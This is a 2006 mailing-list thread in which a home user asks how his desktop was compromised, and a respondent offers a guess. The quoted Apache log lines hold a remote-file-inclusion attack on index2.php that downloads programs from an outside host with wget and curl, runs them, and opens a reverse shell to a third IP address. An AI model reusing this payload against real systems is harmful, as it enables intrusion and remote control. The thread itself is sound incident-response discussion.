My home desktop was compromised, but how?

Tue Feb 28 21:31:25 UTC 2006

Carthik Sharma wrote:
> Hi,
> 
> I run an apache, ssh server from my home computer. I have not
> installed any php scripts whatsoever. All there are are text files,
> and the odd html file.
> 
> Somebody seems to have hacked into my desktop/server. I find files in
> the /tmp/ (like "agent.8213)directory which I cannot open, these are
> setuid-ed -- how do I open these?
> 
> In my apache access logs, there are things like
> "http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|"
> 
> That above is a valid url, and will take you to a script to deface
> someone's php script etc, I suppose. Now, how did this malicious
> hacker get in my computer?
> 
> (The full line is :
> 192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET
> /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|
> HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"  )
> How would I go about tracing how this incident happened?
> 
> Any server/security admins here that can help me with a little
> patience? I really want to get to the root of this and find out why
> whatever happened happened.
> 
> None of the passwords for the ssh accounts are dictionary words, in
> fact all are combinations of letters, numbers and sometimes special
> symbols.
> 
> I have done nothing special to modify apache, or the ssh daemon, in
> fact, sshd listens on port 8888.
> 
> I could paste logs here, but they would be too long. For now, I have
> stopped the apache and ssh servers.
> 
> Any help will be most welcome. My security bubble just burst :(
> 
> Carthik.
> 

I'm not sure how you'd go about tracing down what happened, but my guess
is that it came in with a webpage.  It clearly looks to be an attempt to
break into your machine as the *dc.txt* file it downloaded is a perl
script that looks to me like it attempts to connect an interactive shell
to a remote server of some sort.  I believe this to be malicious because
the script redirects the shell history to /dev/null to hide what was
done.

You mention you are running a web server.  One of the IP addresses
embedded in the long string is the address of a name server at a web
development company.  Are you using such a service?

I don't know if any of this will help, but I hope so.

-- 
Michael J. Lynch

What if the hokey pokey IS what it's all about -- author unknown